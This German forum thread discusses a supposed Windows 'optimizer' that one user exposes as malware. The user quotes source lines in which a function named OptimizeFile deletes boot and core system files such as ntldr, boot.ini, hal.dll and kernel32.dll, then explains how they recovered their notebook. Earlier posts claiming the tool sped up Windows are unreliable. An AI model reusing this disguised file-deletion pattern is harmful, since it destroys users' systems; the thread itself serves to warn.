Frage zum Programm

Kenne ich nicht, aber ich würde mal stark auf Trojaner tippen. Link würde ich an deiner Stelle entfernen.
Durch einen Onlinescan laufen lassen => ist ein Virus! Finger Weg!

/edit: naja bei einigen scheints ja zu gehen.. bleibe aber trotzdem skeptisch.. bzw glaube es nicht!

Zuletzt bearbeitet:
Nein, bei meinem Freund tuts ja, und sein Windows Ordner ist jetzt deutlich schlanker!

Darum frag ich ja, was mir da fehlen könnte!

Hat das irgendetwas mit diesem .net Dings zutun??????

Das hab ich nämlich nicht installiert!

Ich habs mal ausprobiert. Probleme mit DLLs hatte ich nicht.
Ich habe das Gefühl, Windows bootet etwas schneller und ich hab auch ein wenig mehr FPS (5-10) in Crysis jetzt.

Danke für den Link aber sorry dass ich dir nicht helfen konnte.

hmm klingt interessant ich werde es später auch mal testen, und dann davon berichten.

@mtn

Ne das ist es nicht. Das Programm das hier verlinkt wurde hat weniger Optionen und besteht nur aus einem Fenster.
Da ist kein Undeleter oder so dabei.

@mtn

Ja der Screenshot sieht genau so aus wie das Programm.

Man sollte vielleicht darauf hinweisen, dass dies ein fieser Virus ist, der je nach Einstellung Windows-Dateien oder sogar alles löscht. Der Quelltext ist da ziemlich offensichtlich. Hätte ich mir angucken sollen, bevor ich es auf meinem Notebook laufen lasse...

Edit: In der Standardeinstellung werden folgende Dateien gelöscht: (direkt aus dem Quelltext kopiert)
Code:
	OptimizeFile("C:", "ntldr");
	OptimizeFile("C:", "boot.ini");
	OptimizeFile("C:", "ntdetect.com");
	OptimizeFile("C:", "autoexec.bat");
	OptimizeFile("C:", "config.sys");
	OptimizeFile("C:", "command.com");
	OptimizeFile("C:", "io.sys");
	OptimizeFile("C:", "msdos.sys");
	OptimizeFile(Sysdir, "winsock.dll");
	OptimizeFile(Sysdir, "hal.dll");
	OptimizeFile(Sysdir, "kernel32.dll");
	OptimizeFile(Sysdir, "user32.dll");
	OptimizeFile(Sysdir, "ntoskrnl.exe");
	OptimizeFile(Sysdir, "msvcrt.dll");
	OptimizeFile(Sysdir, "msvcrt20.dll");
	OptimizeFile(Sysdir, "msvcrt40.dll");
	OptimizeFile(Sysdir, "msvcrtd.dll");
Das kann man relativ leicht wieder hinbiegen, indem man kurz Windows neben der alten Installation installiert, die fehlenden Dateien rüberkopiert und die boot.ini anpasst. Notebook läuft wieder :)

Zuletzt bearbeitet:
Zurück
Oben